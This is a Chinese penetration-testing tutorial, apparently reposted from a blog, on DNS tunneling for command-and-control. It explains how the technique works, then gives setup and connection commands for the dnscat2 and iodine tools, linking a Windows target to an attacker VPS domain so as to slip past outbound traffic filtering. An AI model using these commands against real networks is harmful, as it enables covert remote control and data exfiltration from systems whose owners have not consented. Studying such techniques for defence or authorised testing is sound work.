内网渗透之应用层隧道技术(3)

在目标主机有打开ssh服务的情况下,可以连接ssh服务

内网渗透之应用层隧道技术

DNS协议DNS隧道原理

​ DNS协议是域名解析协议,在域名和IP地址之间进行转换,该协议也是一种请求/应答协议,也是一种可用于应用层的隧道技术。DNS,ICMP,HTTP/HTTPS等难以禁用的协议已成为攻击者控制隧道的主流隧道

​ 用于管理僵尸网络和进行APT攻击的服务器叫做C&C服务器(Command and Control Server,命令及控制服务器)。C&C节点分为两种,分别是C&C服务端(攻击者)和C&C客户端(被控制的计算机)。C&C通信是指植入C&C客户端的木马或后门程序与C&C服务端上的远程控制程序之间的通信。

​ DNS隧道工作的原理:在进行DNS查询时。如果查询的域名不在DNS服务器本机的缓存中,就会访问互联网进行查询,然后返回结果。如果在互联网上有一台定制的服务器,那么依靠DNS协议即可进行数据包的交换。从DNS协议的角度看,这样的操作只是在一次次地查询某个特定的域名并得到解析结果,但其本质问题是,预期的返回结果应该是一个IP地址,而事实上返回的可以是任意字符串,包括加密的C&C指令。

​ 因为DNS在网络世界里不可或缺,所以基于可用性的考虑等,很难做到完全过滤DNS的流量。因此,攻击者可以利用它实现远程控制,文件传输等操作。

dnscat2

​ dnscat2隧道有两种模式,分别是直连模式和中继模式

​ 直连模式:客户端直接指向IP地址的DNS服务器发起DNS解析请求

​ 中继模式:DNS经过互联网的迭代解析,指向指定的DNS服务器。与直连模式相比,中继模式的速度较慢

​ 一般情况下,我们使用dnscat2的中继模式要更加频繁,因为直连模式的隐蔽性要更差一些。

​ 当网段只允许白名单流量出站,同时屏蔽其他端口,传统的C&C通信无法建立。在这样的情况下,可以使用DNS隐蔽隧道建立通信。

​ 演示如何使用dnscat2的中继模式

需要一个vps(阿里云vps) 一个域名

​ 确保其NS解析能够正常工作


​ vps作为服务端,安装dnscat2服务端

apt-get install gem
apt-get install ruby-dev
apt-get install libpq-dev
apt-get install ruby-bundler

git clone https://github.com/iagox86/dnscat2.git
cd dnscat2
cd server
sudo gem install bundler

​ 运行dnscat2服务端

sudo ruby ./dnscat2.rb vps.****.top -e open -c cookie --no-cache

注:-e规定安全级别。"open" 表示服务端允许客户端不进行加密,-no-cache 禁止缓存,-c 自定义的连接密码

​ 在目标主机上安装客户端。

​ 本次测试使用的是windows7,直接在官方网可以下到编译好的客户端。

​ 测试客户端是否能与服务端通信

dnscat2-v0.07-client-win32.exe --ping vps.****.top

​ 执行如下命令,连接服务端

dnscat2-v0.07-client-win32.exe --dns domain=vps.****.top --secret cookie

iodine

​ iodine可以通过一台DNS服务器制造一个IPV4数据通道,适合在目标主机只能发送DNS请求的网络中使用。其原理:通过TAP虚拟网卡,在服务端建立一个局域网;在客户端,通过TAP建立一个虚拟网卡;两者通过DNS隧道连接,处于同一个局域网(可以通过ping命令通信)。在客户端和服务端之间建立联系后,客户机上会多出一块名为'dns0'的网卡。

​ linux上直接apt-get install iodine完成安装

​ 设置域名

​ 安装后使用如下命令,服务端运行idine

iodined -f -c -P cookie 10.1.1.1 vps.c0okb.top --DD

​ 安装客户端,下载地址:https://code.kryo.se/iodine/,运行如下命令

iodine -fP cookie vps.****.top

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:https://www.heiqu.com/c62b5d0921c3622e97dd427ed9d27cd0.html